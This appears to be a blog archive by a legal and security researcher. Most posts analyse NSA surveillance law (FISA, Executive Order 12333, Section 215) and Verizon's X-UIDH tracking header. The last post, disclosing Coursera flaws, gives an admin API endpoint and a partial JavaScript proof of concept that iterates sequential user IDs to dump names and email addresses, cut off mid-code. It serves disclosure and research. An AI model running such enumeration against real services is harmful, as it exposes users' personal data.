Earlier this week, the Ninth Circuit heard oral arguments in a challenge to the NSA’s phone metadata program. While watching, I noticed some quite misleading legal claims by the government’s counsel. I then reviewed last month’s oral arguments in the D.C. Circuit, and I spotted a similar assertion.

In both cases, the government attorney waved away constitutional concerns about medical and financial records. Congress, he suggested, has already stepped in to protect those files.

With respect to ordinary law enforcement investigations, that’s only slightly true. And with respect to national security investigations, that’s really not right.

Medical Records

During Smith, the Ninth Circuit case, there was an extended line of questioning about various sorts of business records. Judge Hawkins kicked it off:

Suppose the National Security Agency wanted access to all utility records. Nationwide. Would that rationale apply?

Subsequent discussion touched on hotel and financial records. Then Judge McKeown asked:

What about medical records?

The Department of Justice attorney responded:

Well medical records, Judge McKeown I’m so glad you asked that because this is really an important point, medical records would be subject to HIPAA, among other protections.

A similar question in Klayman, the D.C. Circuit case, drew a similar response.

HIPAA, in your example Judge Brown, would govern the restrictions, would impose restrictions on the proper use of medical information.

Later in the Smith argument, counsel reemphasized the importance of HIPAA, including:

But I think the significance of HIPAA can’t be discounted.

By way of background, the Health Insurance Portability and Accountability Act is the primary federal law that addresses health records. Under HIPAA, the Department of Health and Human Services is empowered to promulgate detailed privacy rules.

Here’s the catch: the HIPAA privacy rules have special exceptions for law enforcement and national security investigations.

The law enforcement provision is very broad. It covers all the usual police procedures, including subpoenas. Those don’t require a judge’s advance permission, and they also require much less basis than probable cause.

The national security exception is, of course, even more pertinent to the Smith and Klayman cases. And it’s even broader.

A covered entity may disclose protected health information to authorized federal officials for the conduct of lawful intelligence, counter-intelligence, and other national security activities authorized by the National Security Act (50 U.S.C. 401, et seq.) and implementing authority (e.g., Executive Order 12333).

In non-legalese: HIPAA just doesn’t apply to the NSA.¹ And yet, in two separate NSA appeals, the government has emphasized HIPAA.²

Financial Records

In the Smith argument, government counsel twice noted that Congress has enacted privacy protections for financial records.

Following Miller, Congress enacted the financial privacy protections by statute.

In response to Miller, that Congress enacted a bank records protection of privacy . . .

Similarly, in Klayman:

For example, following the Miller case, Congress passed a statute governing the secrecy of bank records.

As background, United States v. Miller held that routine financial records are not protected by the Fourth Amendment. Two years later, Congress passed the Right to Financial Privacy Act… which largely codified Miller. Law enforcement agencies can still access financial records with just a subpoena.³

What’s more, RFPA includes a special set of national security procedures. Federal grand jury subpoenas and warrants aren’t covered by RFPA, so long as the investigating agency self-certifies “there may result a danger to the national security of the United States.”

RFPA also includes a National Security Letter provision. In counter-intelligence and counter-terrorism investigations, the FBI (and, by proxy, the NSA) doesn’t even need a grand jury subpoena. It can demand financial records with a mere self-certification.

So, once again: in a national security appeal, why emphasize privacy protections that don’t extend to national security investigations?

Section 215 of the USA PATRIOT Act

The precise statutory provision at issue in Smith and Klayman is Section 215 of the USA PATRIOT Act. It allows FBI (and NSA) access to any business records when conducting a counter-intelligence or counter-terrorism investigation.⁴ A FISA judge’s approval is required, though the standard for issuance is very low.

Section 215 covers medical records. A part of the statute, in fact, expressly addresses them.

Section 215 also covers financial records. In a 2010 opinion, the FISA Court held as much. And, in fact, the CIA operates a bulk financial surveillance program under Section 215.

In sum: not only are national security investigations generally outside HIPAA and RFPA, but the very same authority at issue in Smith and Klayman allows access to medical and financial records.

Concluding Thoughts

Reasonable minds can disagree on whether the government’s representations in Smith and Klayman were literally false. At minimum, they were highly misleading.

United States privacy law is notoriously convoluted. But this much is certain: medical and financial records are, by statute and rule, readily available to the intelligence community. The executive branch shouldn’t even hint otherwise.

Thanks to the colleagues who provided feedback on the legal analysis in this post. All views are solely my own.

1. In most instances of domestic surveillance, NSA requests are passed through the FBI. Since the National Security Act designates the FBI as a member of the intelligence community, its national security investigations are also unregulated by HIPAA.

2. In a charitable interpretation, the attorney misspoke while attempting to note that Congress can craft more nuanced privacy rules than the courts, and that Congress can provide privacy protections beyond the Fourth Amendment. Those points are undoubtedly true, though undoubtedly known to the judges.

3. A plain reading of RFPA suggests some privacy protection: targets receive advance notice of a subpoena and have an opportunity to contest the subpoena. In everyday practice, however, RFPA’s delayed notice provisions have swallowed the rule. Law enforcement agencies routinely obtain court orders that both eliminate the advance notice requirement and temporarily gag financial institutions from disclosure.

4. Where U.S. persons aren’t involved, any foreign intelligence purpose is sufficient.

Executive Order 12333 on American Soil, and Other Tales from the FISA Frontier

jonathan — Wed, 03 Dec 2014 18:31:42 +0000

When the National Security Agency collects data inside the United States, it’s regulated by the Foreign Intelligence Surveillance Act. There’s a degree of court supervision and congressional oversight.

When the agency collects data outside the United States, it’s regulated by Executive Order 12333. That document embodies the President’s inherent Article II authority to conduct foreign intelligence. There’s no court involvement, and there’s scant legislative scrutiny.

So, that’s the conventional wisdom. American soil: FISA. Foreign soil: EO 12333. Unfortunately, the legal landscape is more complicated.

In this post, I’ll sketch three areas where the NSA collects data inside the United States, but under Executive Order 12333. I’ll also note two areas where the NSA collects data outside the United States, but under FISA.

If you’re a visual learner, or you’d prefer a TL;DR, here’s a diagram.¹

Transit Authority (Two-End Foreign Wireline Communications)

The United States is the world’s largest telecommunications hub. Internet traffic and voice calls are routinely routed through the country, even though both ends are foreign.

According to leaked documents, the NSA routinely scoops up many of these two-end foreign communications as they flow through American networks.² The agency calls it “International Transit Switch Collection,” operated under “Transit Authority.” That authority stems from Executive Order 12333, not the Foreign Intelligence Surveillance Act.

How, you might wonder, is the program legal? Hasn’t Congress established “the exclusive means by which electronic surveillance . . . may be conducted” on American soil?

After poring over declassified and leaked materials, I haven’t found a clear explanation. So, working backward from the relevant statutes, here’s my best reconstruction of the NSA’s legal theory. Transit Authority is a three-step dance through FISA and the Wiretap Act, and I think it’s fairly persuasive.

1. This Isn’t “Electronic Surveillance” Under FISA

The term “electronic surveillance” has a precise (and counterintuitive) meaning in FISA. There are multiple parts to the definition; the component that directly addresses wireline intercepts is 50 U.S.C. § 1801(f)(2). It encompasses:

the acquisition . . . of the contents of any wire communication to or from a person in the United States . . . if such acquisition occurs in the United States

A two-end foreign communication is, of course, not “to or from a person in the United States.” When the NSA intercepts a two-end foreign wireline communication, then, it hasn’t engaged in “electronic surveillance.”³

Much of FISA is scoped to the term “electronic surveillance,” including some key exclusivity provisions. Just by navigating that definition, the NSA can largely escape FISA’s restrictions.

2. This Falls into the Wiretap Act’s Foreign Intelligence Exception

Since 1968, the Wiretap Act has been the primary statutory scheme that regulates government interception of communications content. As you would expect, “electronic surveillance” that is authorized by FISA is also allowed by the Wiretap Act.⁴ But what about an NSA interception, inside the United States, that doesn’t count as “electronic surveillance”?

Many legal observers have assumed that the Wiretap Act and FISA are coextensive.⁵ Even the Congressional Research Service concluded as much. If a government agency intercepts content inside the United States, the thinking goes, it has two options. It can follow the law enforcement procedures, under the Wiretap Act. Or it can follow the (often lax) foreign intelligence procedures, under FISA. That legal structure would make sense—but it’s not how the law stands.

There is, in fact, a doughnut hole between the Wiretap Act and FISA. It’s located in 18 U.S.C. § 2511(2)(f), and it provides:

Nothing contained in [the Wiretap Act, the Stored Communications Act, or the Pen Register Act] shall be deemed to affect the acquisition by the United States Government of foreign intelligence information from international or foreign communications . . . utilizing a means other than electronic surveillance as defined in [FISA] . . . .

Let me unpack that dense legalese. Assume an intelligence agency intercepts a one-end foreign communication inside the United States.⁶ If the interception isn’t covered by FISA, it still isn’t covered by the Wiretap Act. There’s a gap between the two statutory schemes.

3. These Aren’t “Domestic” Communications Under FISA and the Wiretap Act

Both the Wiretap Act and FISA include exclusivity provisions. The Wiretap Act text, in 18 U.S.C. § 2511(2)(f), reads:

[Procedures] in [the Wiretap Act, the Stored Communications Act, and FISA] shall be the exclusive means by which electronic surveillance, as defined in [FISA], and the interception of domestic wire, oral, and electronic communications may be conducted.

The similar FISA text, in 50 U.S.C. § 1812, says:

Except as [otherwise expressly authorized by statute,] the procedures of [the Wiretap Act, the Stored Communications Act, the Pen Register Act, and FISA] shall be the exclusive means by which electronic surveillance and the interception of domestic wire, oral, or electronic communications may be conducted.

Once again unpacking the legalese, these parallel provisions establish exclusivity for 1) “electronic surveillance” and 2) interception of “domestic” communications. As I explained above, intercepting a two-end foreign wireline communication doesn’t constitute “electronic surveillance.” As for what counts as a “domestic” communication, the statutes seem to mean a communication wholly within the United States.⁷ A two-end foreign communication would plainly flunk that definition.

So, there’s the three-step maneuver. If the NSA intercepts foreign-to-foreign voice or Internet traffic, as it transits the United States, that isn’t covered by either FISA or the Wiretap Act. All that’s left is Executive Order 12333.

Satellite Surveillance (One-End Foreign Wireless Communications)

A recently declassified 2008 oral argument contains this gem from the government’s counsel:

And one aspect of [surveillance outside FISA] is the satellite communications, where you have [individuals] outside the United States communicating by satellite, and those messages are picked up at a satellite dish inside the United States. And for decades those communications have been outside the FISA process . . . .

The context of the attorney’s argument hinted that the NSA would collect not just two-end foreign satellite communications under Executive Order 12333, like the Transit Authority, but also one-end foreign communications.⁸ A leaked diagram of the NSA’s authorities also suggests that domestic collection of one-end foreign satellite communications is outside FISA.⁹

I once more couldn’t find a public explanation, so I again attempted a statutory reconstruction. A very similar three-step legal theory would place one-end foreign radio communications under Executive Order 12333.

1. This Isn’t “Electronic Surveillance” Under FISA

Here’s the part of the “electronic surveillance” definition that bears on radio communications:

the intentional acquisition . . . of the contents of any radio communication . . . if both the sender and all intended recipients are located within the United States

In less legalese, a radio interception is “electronic surveillance” only if every party is inside the United States.¹⁰ The rule for wireline¹¹ communication, by contrast, is more strict; there is “electronic surveillance” if any party is inside the United States.

2. This Falls into the Wiretap Act’s Foreign Intelligence Exception

This argument would be the same as for two-end foreign wireline communications.

3. These Aren’t “Domestic” Communications Under FISA and the Wiretap Act

Again, the same.

The law that results is quite counterintuitive. If a communication is carried by radio waves, and it’s one-end foreign, it falls under Executive Order 12333. If that same communication were carried by a wire, though, it would fall under FISA. (Specifically, the Section 702 upstream program.)

As for how this Executive Order 12333 authority might be used beyond satellite surveillance, I could only speculate. Perhaps intercepting cellphone calls to or from foreign embassies?¹² Or along the national borders? At any rate, the FISA-free domestic wireless authority appears to be even broader than the Transit Authority.

Classified Annex Authority (Targeted Warrantless Surveillance)

A third area of Executive Order 12333, on American soil, is the “Classified Annex Authority” or “CAA.” Its source is a classified addition to Executive Order 12333, set out in an NSA policy document.¹³ The most recent revision, from 2009, reads:

Communications of or concerning a United States person¹⁴ may be intercepted intentionally or selected deliberately . . .

with specific prior approval by the Attorney General based on a finding by the Attorney General that there is probable cause to believe the United States person is an agent of a foreign power and that the purpose of the interception or selection is to collect significant foreign intelligence. Such approvals shall be limited to a period of time not to exceed ninety days for individuals and one year for entities.

That provision appears to allow the Attorney General to unilaterally trump FISA. I’m not entirely confident that’s what it means, but it sure looks like it.¹⁵

I’m skeptical that the executive branch can just brush aside FISA, especially on American soil. In Justice Jackson’s famous phrasing, when the executive branch acts in clear violation of a legislative enactment, its “power is at its lowest ebb.” Nevertheless, the executive branch does appear to claim that Article II can override FISA, and it does appear to have invoked this Classified Annex Authority on occasion.¹⁶

Surveillance Targeting Americans Worldwide

Much like Executive Order 12333 can operate on American soil, FISA can operate on foreign soil. The first area that I’d like to flag is surveillance intentionally directed against Americans. If the NSA targets a U.S. person, anywhere in the world, that’s covered by FISA. And it generally requires a court order.¹⁷

There are two sources for this protection. U.S. persons inside the United States are covered by the traditional FISA “electronic surveillance” provisions, even if interception occurs outside the United States.¹⁸ U.S. persons outside the United States are protected by the FISA Amendments Act, which added new procedures for cases where the person, or both the person and the interception, are outside the United States.

International Interception of Purely Domestic Wireless Communications

There is a second area of extraterritorial FISA that I’d like to note. It’s subtle, narrow, and probably not of much practical importance. It does, though, further underscore the quirky statutory coverage.

So, here it is: If the NSA intercepts a wireless communication, outside the United States, and all the parties to that communication are inside the United States, that’s covered by FISA.¹⁹ It doesn’t matter if the target is a foreigner.

Closing Thoughts

I hope you’re persuaded that the division between FISA and Executive Order 12333 is far more complicated than where an interception occurs. It also depends on the communications medium, the location of the parties to the communication, the U.S. personhood of the target, and (allegedly) the Attorney General’s willingness to override FISA.
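To make those factors concrete, here is a rough Python sketch of the coverage rules as this post reads them. It is an illustration of my reconstruction, not legal advice and not anything drawn from NSA materials: the function name, argument names, and return labels are hypothetical, and the sketch deliberately ignores the Classified Annex Authority, metadata collection, and incidental or bulk collection.

```python
def governing_authority(medium, intercepted_in_us, parties_in_us,
                        targets_us_person=False):
    """Return "FISA" or "EO 12333" for a content interception.

    medium: "wire" or "radio".
    intercepted_in_us: True if the interception occurs on American soil.
    parties_in_us: one bool per party, True if that party is inside the U.S.
    targets_us_person: True if a U.S. person is intentionally targeted.
    """
    if not parties_in_us:
        raise ValueError("need at least one party")
    if targets_us_person:
        # Targeting a U.S. person anywhere in the world falls under FISA.
        return "FISA"
    if medium == "radio":
        # Radio is "electronic surveillance" only if every party is in the
        # U.S., and that holds wherever the interception happens.
        return "FISA" if all(parties_in_us) else "EO 12333"
    if medium == "wire":
        # Wireline is "electronic surveillance" if the interception is
        # domestic and any party is in the U.S.
        if intercepted_in_us and any(parties_in_us):
            return "FISA"
        return "EO 12333"
    raise ValueError("unknown medium: " + repr(medium))

transit = governing_authority("wire", True, [False, False])
upstream = governing_authority("wire", True, [True, False])
satellite = governing_authority("radio", True, [True, False])
domestic_radio_abroad = governing_authority("radio", False, [True, True])
```

The four calls correspond to Transit Authority, Section 702 upstream collection, one-end foreign satellite interception, and the foreign interception of purely domestic wireless traffic described above.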

I hope you’re also persuaded that FISA’s coverage formula is a questionable fit for modern technology. The definition of “electronic surveillance,” in particular, hasn’t been updated for 35 years. It predates the popularity of the Internet and cellphones, which have respectively generated enormous volumes of two-end foreign wireline and one-end foreign wireless communications.

Surveillance reformers and oversight bodies have, rightly, begun to more closely scrutinize Executive Order 12333. In the process, it’s important to recognize that there are FISA-free zones in our own backyard.

1. An NSA authority diagram has leaked, but it’s less precise. That, along with a declassified training manual, provided helpful structure for FISA’s contours.

This diagram, and this post, are focused on communications content. I should note that Executive Order 12333 could also operate on American soil, for collection of one-end foreign metadata. The argument is very similar to the Transit Authority theory; intercepting metadata is not “electronic surveillance” because the definition requires content, and the rest is the same.

2. Leaks do not indicate whether this is a bulk surveillance program, or a massive—but targeted—surveillance program.

3. A separate part of the “electronic surveillance” definition, 50 U.S.C. § 1801(f)(1), covers intercepts targeting U.S. persons inside the United States. I’ve lumped that provision into the last part of this post.

4. Specifically, 18 U.S.C. § 2511(2)(e) excepts FISA “electronic surveillance” from the Wiretap Act, the Stored Communications Act, and the Pen Register Act.

5. A 2005 letter from leading legal scholars, for instance, emphasized that the Wiretap Act and FISA are the sole authorities for surveillance within the United States.

6. I assume the terms “international” and “foreign” mean, respectively, one-end foreign and two-end foreign. That would be consistent with how the intelligence community has used those terms elsewhere, as well as the term “domestic” used in the Wiretap Act and FISA. As for the “foreign intelligence information” requirement, that term has exceedingly broad meaning.

7. The term “domestic” in FISA appears to contrast with the terms “international” and “foreign,” noted above.

8. The attorney was making an argument about how the Fourth Amendment’s warrant requirement hasn’t previously applied to foreign intelligence surveillance within the United States, targeting U.S. persons outside the United States. For purposes of this post, I’m focusing on the FISA analysis, not the constitutional issues. As for one-end foreign satellite communications, the hint was that U.S. persons abroad would likely communicate with individuals inside the United States. These intercepts would, consequently, include some one-end foreign communications.

9. A footnote in the diagram notes that satellite interception stations (“FORNSAT”) within the United States are not governed by FISA’s one-end foreign provision (Section 702), which would mean they are governed by Executive Order 12333.

10. Again, if the target is a U.S. person inside the United States, then it’s still “electronic surveillance.” See note 3 above.

11. The term “wire communication,” in FISA, means a wireline communication. In the Wiretap Act, and the Electronic Communications Privacy Act in general, it (confusingly) has a different meaning. There, the term means audio communications, where any part of the transmission involves a wire.

12. There’s corroboration for this in the leaked NSA authority diagram. It suggests that some NSA Special Collection Service sites, within the United States, are regulated by Executive Order 12333. Leaked documents indicate that SCS surveils foreign embassies within the United States.

13. Specifically, NSA/CSS Policy 1-23 § 4.A.I.(a)(4). That document implements DoD Directive 5240.01, which in turn implements Executive Order 12333.

14. In this context, the term U.S. person is explicitly expanded to include aliens inside the United States.

15. The NSA’s authority diagram, as well as a training document, suggest that the Classified Annex Authority only applies to foreigners inside the United States. It’s unclear what the textual basis for that restriction would be, though, in NSA/CSS Policy 1-23 itself. Perhaps, as a matter of discretion, the Department of Justice chooses to not invoke CAA for U.S. persons. That discretion could change, of course.

A separate provision of NSA/CSS Policy 1-23, section 4.A.I.(d)(3), suggests that compliance with FISA is always mandatory. I think the best reading of that provision, placed in context, is that it deals with the emergency scenario of targeted foreigners who enter the United States. Under those circumstances, prompt FISA compliance is usually required.

16. This intelligence community view that Article II can trump FISA is consistent with declassified Department of Justice Office of Legal Counsel memos on the subject. Given that the NSA’s basic training materials describe the Classified Annex Authority, it seems safe to assume that CAA has been used on occasion.

17. These provisions do not protect an American against “incidental” collection, where they are a party to a communication but another party is targeted outside FISA. The scope of incidental collection can be massive; it can, for instance, involve popular foreign websites.

As interpreted by the executive branch, these provisions also do not appear to protect an American against bulk extraterritorial interceptions. Those programs, such as bulk one-end foreign Internet interception in the United Kingdom, appear to involve a two-step process. Interceptions are, initially, conducted under Executive Order 12333. (That is, there is no FISA procedure or reporting.) Then, if an NSA analyst wishes to explicitly single out an American’s data, a FISA court order is usually required.

18. The “electronic surveillance” definition, in 50 U.S.C. § 1801(f)(1), does not expressly encompass interceptions outside the United States. Ordinarily, statutory provisions are presumed to not have extraterritorial effect. What’s more, that provision is scoped to areas where “a warrant would be required for law enforcement purposes.” Under modern doctrine, that probably doesn’t cover international interceptions. Nevertheless, the executive branch appears to consistently read the provision to apply to interceptions outside the United States. Public statements and NSA training documents both reflect that view.

I think that’s the right reading of FISA, for four reasons. First, it’s confirmed by FISA’s legislative history. Senate reports 95-604 and 95-701, for instance, expressly note that the original protection for domestic Americans was intended to apply to extraterritorial interceptions. Second, the part of the “electronic surveillance” definition that addresses wire communications specifies that it only covers domestic interceptions. The implication is that other parts of the definition do cover extraterritorial interceptions. If that weren’t the case, the wire communications caveat would be surplusage. Third, the presumption against extraterritoriality is still somewhat vindicated. This particular provision only protects U.S. persons inside the United States. Fourth, the doctrine around extraterritorial warrants is more modern than FISA, so Congress could not have been considering that limitation at the time.

19. The source of this protection is the “electronic surveillance” definition. That’s because the part of the definition covering purely domestic wireless interception, 50 U.S.C. § 1801(f)(3), is not limited to domestic interceptions. The textual reasoning is the same as for extraterritorial interceptions targeting domestic U.S. persons, and it’s also confirmed by legislative history.

Continuing the Phone Metadata Program Without Congress: Three Options

jonathan — Wed, 26 Nov 2014 19:01:27 +0000

In the debates surrounding intelligence reform, many observers have made a critical assumption. If Congress doesn’t act by mid-2015, it goes, the NSA’s controversial phone metadata program will turn into a pumpkin. In this post, I’m going to sketch why that view is so common—and why, regrettably, the clock may not strike midnight.

Why Would the Program Expire in 2015?

In 2006, the Foreign Intelligence Surveillance Court (FISC) first authorized the NSA’s domestic bulk phone metadata program. Since that initial court order, the statutory basis for the program has been the Foreign Intelligence Surveillance Act (FISA) business record authority. It’s more commonly known as Section 215 of the USA PATRIOT Act.

Here’s the catch: the business record authority has a shelf life. Congress has to affirmatively renew it from time to time. The latest expiration date is June 1, 2015.

So, the basic reasoning is understandable.

Premise 1: The phone metadata program is based on Section 215 authority.

Premise 2: If Congress doesn’t act by mid-2015, that authority will sunset.

Assumption: If the Section 215 authority goes poof, it takes the phone metadata program with it.

Conclusion: Without a prompt legislative deal, lights out for the phone metadata program.

Unfortunately, that reasoning isn’t airtight. The executive branch has at least three non-frivolous legal theories for keeping the program alive.

The Section 215 Option: An Ongoing “Investigation”

The Section 215 sunset has a key exception. It reads that the provision will expire, “except… with respect to any particular foreign intelligence investigation that began before June 1, 2015.” Some observers have suggested that the NSA’s phone metadata program should qualify. (Including in the New York Times.)

I’m skeptical. And, based on chats with several surveillance law gurus, that’s a common perception. If the exception language were about an investigation, it’d be a reach. But the language calls for a particular investigation.¹

The FISC has bought some exceedingly strained legal reasoning before, so I wouldn’t rule this option out. It’s undoubtedly a legal long shot, though.

The Section 214 Option: Shifting to Pen/Trap Authority

The FISC approved its first bulk surveillance program in 2004. That program didn’t cover phone metadata, and it didn’t rely on FISA business record authority. Rather, the program covered email metadata,² and it relied on FISA pen register / trap and trace device authority. (These days, a pen/trap is a legal term of art for prospective collection of communications metadata.)

While the email program is now defunct, the underlying legal theories are not. Section 214 of the USA PATRIOT Act established the expanded pen/trap authority that the FISC relied on. And, when Congress renewed the USA PATRIOT Act in 2006, it made Section 214 permanent.

That means the executive branch has a ready legal fallback. If Section 215 expires without congressional intervention, the NSA can renew its phone program under Section 214.

Before an ordinary court, the Section 214 option would also be a long shot. The NSA’s phone metadata program sure looks nothing like an ordinary pen/trap.

Before the FISC, though, the Section 214 option is likely a slam dunk. From 2004 to 2011, the FISC consistently approved a nearly identical metadata program under Section 214. In order to reject the Section 214 option, the FISC would have to depart from its prior views. That’s not likely.

The Article II Option: Reasserting Inherent Presidential Power

When the NSA began its domestic email and phone metadata programs, it operated both under the President’s inherent Article II power. A subsequent review by the Department of Justice Office of Legal Counsel concluded that the email program was unlawful without FISC approval. It did not, however, conclude that the phone program was unlawful.³

The Obama administration could, conceivably, resume the Bush administration position. When Section 215 expires, the Department of Justice could start serving Article II demands on telecom services. As a political matter, that would be a terrible idea—the White House is already combating perceptions of an “imperial” presidency. The telecoms would likely also disapprove, since they wouldn’t qualify for civil immunity. All of that said—as a purely legal matter, the position would be consistent.

Comparing the Options

It’s easy to see why the executive branch would prefer a Section 215 ongoing “investigation.” That approach would preserve any other programs that operate under Section 215, including the CIA’s bulk financial records program. It could even leave the door open to future programs, like bulk collection of cellphone location. Those other programs might not comfortably fit into Section 214 or Article II.⁴

What’s more, Section 215 provides no statutory protection to criminal defendants. Section 214, by contrast, can require notice of how evidence was obtained. And it provides a suppression remedy—a key vehicle for challenging the program’s legality.

Another perk of Section 215 is that it wouldn’t require any technical changes. In the current program, carriers forward call records to the NSA. A couple of colleagues have suggested that under a Section 214 version, the NSA might have to collect the call records itself. I don’t think that’s right—pen/trap orders to online services routinely require forwarding copies of metadata. At any rate, even if a technical change were needed, the NSA has more than sufficient capability to accomplish that collection itself.⁵

So, if I were an intelligence community lawyer tasked with extending the phone metadata program, here’s what I’d be thinking. First, pitch the FISC on the Section 215 ongoing “investigation” theory. If that works, great. It probably won’t. Then, use Section 214 as a backstop.

Closing Thoughts

Let me be clear: I think the domestic bulk phone metadata program should end. It hasn’t produced unique intelligence value, and it has enormous privacy implications. The President’s Review Group and the Privacy and Civil Liberties Oversight Board both reached the same conclusion. Even the White House and the NSA now support structural reform.

That reform debate will continue to play out in Congress. And in the debate, critics of the NSA thought they had crucial leverage—a June 2015 make-or-break deadline for a major agency program.

There is, to be sure, still substantial leverage. The intelligence community values FISA business record authority—it allows access to communications metadata that’s beyond the reach of a national security letter. And if the executive branch were to extend the phone metadata program without Congress, on any legal theory, it would undoubtedly catch political flak.

The key point of leverage, though, was supposed to be the phone metadata program. It’s not necessarily ending.

Thanks to the fellow wonks who kicked around the ideas in the post. All views are solely my own.

1. What’s more, a subsequent part of the exception deals with particular criminal investigations—plainly not dragnet programs. Perhaps the NSA could keep the program partially in operation, only for previously approved targets. That would be an awkward outcome, and at any rate, it could sharply curtail any future intelligence value from the program.

2. Some documents suggest Internet Protocol metadata, unrelated to email, was also collected under this program. The NSA and the FISC appear to have focused mostly on email metadata, though.

3. The relevant OLC memos are, unfortunately, still classified. A summary is available in a leaked NSA Inspector General report. My best guess is that OLC concluded the law enforcement (ECPA) pen/trap prohibition in 18 U.S.C. § 3121 is stronger than the customer records disclosure prohibition in 18 U.S.C. § 2702. But that’s really just a guess.

4. Financial records, for instance, plainly aren’t the sort of communications metadata covered by a pen/trap order. And a FISA pen/trap order may not be sufficient for obtaining phone location because of a separate provision in CALEA.

5. A related issue is that by switching to pen/trap authority, the NSA would be admitting the phone metadata program was a pen/trap all along. The ECPA pen/trap provisions generally prohibit operating a pen/trap without a pen/trap order, so you might think the NSA would be admitting past illegality. The NSA has at least two possible responses, though. First, the ECPA pen/trap prohibition makes an exception for any FISA order, not just FISA pen/trap orders. That covers business record orders. Second, if the NSA shifted to direct collection from telecoms, that should sufficiently distinguish the old version of the program as not a pen/trap.

How Verizon’s Advertising Header Works

jonathan — Fri, 24 Oct 2014 19:32:50 +0000

Over the past couple of days, there’s been an outpouring of concern about Verizon’s advertising practices. Verizon Wireless is injecting a unique identifier into web requests, as data transits the network. On my phone, for example, here’s the extra HTTP header.¹

X-UIDH: OTgxNTk2NDk0ADJVquRu5NS5+rSbBANlrp+13QL7CXLGsFHpMi4LsUHw

After poring over Verizon’s related patents and marketing materials, here’s my rough understanding of how the header works.

In short, Verizon is packaging and selling subscriber information, acting as a data broker on real-time advertising exchanges. Questionable. By default, the information appears to consist of demographic and geographic segments.² If a user has opted into “Verizon Selects,” then Verizon also shares behavioral profiles built by deep packet inspection.

Whatever the merits of Verizon’s new business model, the technical design has two substantial shortcomings. First, the X-UIDH header functions as a temporary supercookie.³ Any website can easily track a user, regardless of cookie blocking and other privacy protections.⁴ No relationship with Verizon is required.

Second, while Verizon offers privacy settings, they don’t prevent sending the X-UIDH header.⁵ All they do, seemingly, is prevent Verizon from selling information about a user.

Much better designs are possible. Verizon doesn’t need to supercookie its wireless subscribers to sell their advertising segments.⁶ And it certainly doesn’t need to send a supercookie if a user isn’t participating.

The diagram above includes phone, server, cloud, and cash assets from The Noun Project. Thanks to the participants in Princeton’s Web Tracking and Transparency Workshop, who provided valuable feedback.

1. In my (very limited) testing, the header was injected into every HTTP request from my iPhone 6 Plus. Some subscribers have reported not seeing the header, or only seeing the header with certain requests.

2. Verizon’s case studies also suggest the system can be used for advertising attribution.

3. According to a comment on Hacker News, the X-UIDH value changes each week. I can’t (yet) confirm that. Over the past two days, anyway, the X-UIDH value for my phone has been static.

4. Blocking HTTP requests, with a tool like Adblock Plus or Privacy Badger, would still be effective.

5. If I understand correctly, the demographic and geographic advertising segments are opt out, associated with Verizon’s CPNI privacy preference. Behavioral segments are opt in, associated with the “Verizon Selects” preference (formerly “Relevant Mobile Advertising”).

6. For example, Verizon could send an encrypted ID and nonce with each request. A recipient website would not be able to use the values to track a user.
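Here is a minimal sketch of what such a design could look like. It is not Verizon's system. The key handling, the function names, and the choice of AES-256-GCM with a random 12-byte nonce are all my own assumptions for illustration. The point is only that a fresh nonce makes the header value different on every request, so a website without the key has nothing stable to track.

```javascript
const crypto = require("crypto");

// Hypothetical secret, assumed to be held only by the carrier and its
// advertising partners. Generated at random here for the sketch.
const carrierKey = crypto.randomBytes(32);

// Encrypt a subscriber ID under a fresh random nonce, so the resulting
// header value changes on every request.
function makeHeaderValue(subscriberId, key) {
    const nonce = crypto.randomBytes(12);
    const cipher = crypto.createCipheriv("aes-256-gcm", key, nonce);
    const ciphertext = Buffer.concat([
        cipher.update(subscriberId, "utf8"),
        cipher.final()
    ]);
    const tag = cipher.getAuthTag();
    // Layout (an assumption): 12-byte nonce, 16-byte tag, then ciphertext.
    return Buffer.concat([nonce, tag, ciphertext]).toString("base64");
}

// Only a key holder can turn a header value back into a subscriber ID.
function readHeaderValue(headerValue, key) {
    const raw = Buffer.from(headerValue, "base64");
    const nonce = raw.subarray(0, 12);
    const tag = raw.subarray(12, 28);
    const ciphertext = raw.subarray(28);
    const decipher = crypto.createDecipheriv("aes-256-gcm", key, nonce);
    decipher.setAuthTag(tag);
    return Buffer.concat([
        decipher.update(ciphertext),
        decipher.final()
    ]).toString("utf8");
}
```

Two calls to makeHeaderValue with the same subscriber ID produce different strings, while readHeaderValue recovers the ID for anyone holding the key.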

A Funny Thing Happened on the Way to Coursera

jonathan — Thu, 04 Sep 2014 16:26:23 +0000

I’m excited to be teaching Stanford Law’s first Coursera offering this fall, on government surveillance. In preparation, I’ve been extensively poking around the platform; while I found some snazzy features, I also stumbled across a few security and privacy issues.

1. Any teacher can dump the entire user database, including over nine million names and email addresses.
2. If you are logged into your Coursera account, any website that you visit can list your course enrollments.
3. Coursera’s privacy-protecting user IDs don’t do much privacy protecting.

The balance of this piece provides some detail on each of the vulnerabilities.

Update 9/4: Coursera has acknowledged the issues, and claims they are “fully addressed.” The second vulnerability, however, still exists.

Update 9/6: Coursera appears to have imposed rate limiting on the APIs associated with the second vulnerability, mitigating the risk to users. A malicious website can now iterate over about 10% of the course catalog before having to wait.

1. Downloading Coursera’s User Database

Several of Coursera’s teacher pages include a user autocomplete field.

Example autocomplete field, for creating a new instructor.

After typing a few characters from a user’s email address, a drop down makes suggestions. That was an immediate red flag, since autocomplete is usually based on information that a user can already access. Webmail autocomplete, for example, relies on previous messages; social network autocomplete relies on a public directory.

Autocomplete with semi-private information is inherently risky: it’s easy to inadvertently share too much. A similar vulnerability in AT&T’s iPad registration website, for example, enabled Daniel Spitler and Andrew “weev” Auernheimer to dump subscriber email addresses. (The two were subsequently prosecuted. Jennifer Granick and I coauthored an amicus brief in Auernheimer’s appeal, arguing that he hadn’t violated the federal hacking law.)

Back to Coursera. The email autocomplete, I noticed, uses a simple API endpoint. A request for

http://www.coursera.org/maestro/api/admin/search?email=jm

returns something like

[...,
    {
        "auth_type": 0,
        "display_email": "jmayer@...",
        "id": 544426,
        "full_name": "Jonathan Mayer",
        "email": "jmayer@..."
    }, ...
]

It’s also possible to query the API using Coursera’s sequential (“internal”) user IDs.

https://www.coursera.org/maestro/api/admin/search?id=544426

Since the API does not have any rate limiting in place, anyone with teacher access could trivially iterate over user IDs or email substrings and dump the entire database. As a proof of concept, I cobbled together the following JavaScript. It fetches 1,000 user names and email addresses.

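// Proof of concept: look up users by sequential internal ID.
var users = [];
var startID = 1;
var stopID = 1000;
for (var i = startID; i <= stopID; i++) {
    var req = new XMLHttpRequest();
    req.onload = function() {
        try {
            // "this" is the request that fired. Declare data locally
            // rather than leaking an implicit global.
            var data = JSON.parse(this.responseText);
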